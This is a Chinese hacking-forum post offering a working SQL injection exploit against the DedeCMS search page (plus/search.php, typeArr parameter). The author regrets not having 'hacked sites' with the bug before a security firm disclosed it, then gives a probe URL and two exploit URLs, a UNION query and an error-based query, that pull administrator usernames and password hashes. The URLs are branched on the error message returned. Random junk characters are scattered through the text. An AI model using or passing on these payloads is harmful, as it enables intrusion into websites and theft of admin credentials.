转载不加作者名的没JJ
/ S; V" S8 m" S: P( e& r; P
5 h% b, b7 g, J! A3 ~4 C哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。' n3 n# W! w3 \, N" J
3 e* I4 Y2 A7 _6 V既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; b2 `* ^+ \) w3 c0 X; f. A# P7 E. w
我一般是这样测试的:" ]$ x; v; U. z. C4 f
2 _+ t5 ^' s8 [2 Y' E7 M& o% c: v
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a5 g* _5 ~* ^+ ~5 S& I. E. ?) g
! i4 ^5 T3 Y/ s* D4 L! p转载不加作者名的没JJ0 ~4 N3 r0 Z9 P
2 W- u$ S- N( [, f作者:鬼哥9 G' O. E4 P( S' I$ k3 [
: ^4 a9 N3 @8 o# i
. B* @2 T1 Y4 `6 P. F( q W3 b8 m* s' ` T2 Y# L" o
看结果如果提示$ Z6 v: {) _7 M" `1 Y
( J+ g8 A( V) q: |0 X% BSafe Alert: Request Error step 2 !* _" p+ _* n; h
# M! e- |0 d7 m# Z$ ~. H% r那么直接用下面的exp
* ~$ B( j$ ], e1 d: r, Q
/ s- O5 N, G. \; N, S+ s `7 Jxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/ E, b8 u# K1 R; q1 J/ U, k }+ T% L
8 g/ I) Z! x' L1 o( J& d2 R* N: R0 j
5 j* P) c6 l$ O. @ M
看结果如果提示. z) G4 }! O/ x& W5 U
- F* f$ t0 v* V! c" V8 Q
Safe Alert: Request Error step 1 !
7 j& Q) A) b& g3 r1 ~9 ]$ _: N: t. t% Y$ e
那么直接用下面的exp0 k, u& ^$ r8 l; E. x9 ^
9 Z1 d& w5 h* mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
% A) U. \1 d# F( G
6 V1 {1 V8 u+ [. C- ?$ \
' F9 Y d; R) e6 J7 r. H: ?3 a! c如果正常显示证明漏洞不存在了。
. Y; _7 u& b. H" \+ l1 q+ s' T0 P3 X
转载不加作者名的没JJ |